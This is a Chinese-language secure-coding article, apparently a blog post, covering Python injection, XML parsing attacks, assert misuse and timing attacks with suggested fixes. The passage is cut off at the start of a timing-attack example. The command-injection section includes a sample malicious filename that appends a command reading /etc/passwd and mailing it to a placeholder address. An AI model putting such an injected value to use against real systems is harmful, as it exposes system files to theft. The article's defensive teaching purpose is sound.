Python常见安全漏洞及修复方法集合！你所不会的这里都有！

概述

编写安全的代码很困难，当你学习一门编程语言、一个模块或框架时，你会学习其使用方法。在考虑安全性时，你需要考虑如何避免代码被滥用，Python也不例外，即使在标准库中，也存在着许多糟糕的实例。然而，许多 Python 开发人员却根本不知道这些。

以下是我总结的10个Python常见安全漏洞，排名不分先后。

1、输入注入

注入攻击影响广泛且很常见，注入有很多种类，它们影响所有的语言、框架和环境。

SQL 注入是直接编写 SQL 查询（而非使用 ORM） 时将字符串与变量混合。我读过很多代码，其中“引号字符转义”被认为是一种修复，但事实并非如此，可以通过 SQL 注入所有可能发生的方式。

命令注入有可能在使用 popen、subprocess、os.system 调用一个进程并从变量中获取参数时发生，当调用本地命令时，有人可能会将某些值设置为恶意值。

下面是个简单的脚本（链接：https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html），使用用户提供的文件名调用子进程：

攻击者会将filename的值设置为“; cat /etc/passwd | mail them@domain.com或者其他同样危险的值。

修复方法：

如果你使用了 Web 框架，可以用附带的实用程序对输入进行清理，除非有充分的理由，否则不要手动构建 SQL 查询，大多数 ORM 都有内置的清理方法。

对于 shell，可以使用 shlex 模块正确地转义输入。

2、解析XML

如果您的应用程序加载并解析XML文件，可能您正在使用一个XML标准库模块。有一些针对XML的常见攻击。大多数为DoS风格（旨破坏系统而不是盗取数据）。这些攻击很常见，特别是在解析外部（即不可信任的）XML文件时。

其中一种攻击为“billion laughs”，因为加载的文件包含了很多个（数十亿）“lols”。你可以加载XML实体文件，当XML解析器试图将这个XML文件加载到内存中时，会消耗很多个G的内存。不信就试试看:-)

另一种攻击使用外部实体扩展。 XML支持从外部URL引用实体，XML解析器通常会直接获取并加载该资源。“攻击者可以绕开防火墙访问保密资源，因为所有请求都是由内部可信的IP地址创建的，请求不是来自于外部。”

需要考虑的另一种情况是您要依赖于第三方软件包来解码XML，例如配置文件，远程API。您甚至不知道您的某个依赖包已经暴露在攻击之下。

那么在Python中会发生什么？标准库模块etree，DOM，xmlrpc都容易遭受这些类型的攻击。详情参考此链接： https://docs.python.org/3/library/xml.html#xml-vulnerabilities

修复方法:

直接用defusedxml（链接：https://pypi.org/project/defusedxml/）替换标准库模块。它增加了针对这类攻击的安全防护。

3、Assert 语句

不要使用 assert 语句来防止用户访问特定代码段。例如：

默认情况下，Python 以 __debug__ 为 true 来执行脚本，但在真实环境中，通常使用优化运行，这将会跳过 assert 语句并直接转到安全代码，而不管用户是否是 is_admin 。

修复方法：

仅在单元测试中使用 assert 语句。

4、计时攻击

计时攻击本质上是一种通过计算比较提供值所需时间来暴露行为和算法的方式。计时攻击需要精确性，所以通常不能用于高延迟的远程网络。由于大多数 Web 应用程序涉及可变延迟，因此几乎不可能针对 HTTP Web 服务器编写计时攻击。

但是，如果你的应用程序有提示输入密码的命令行，攻击者就可以编写一个简单的脚本来计算将其值与实际密码进行比较所需的时间。例子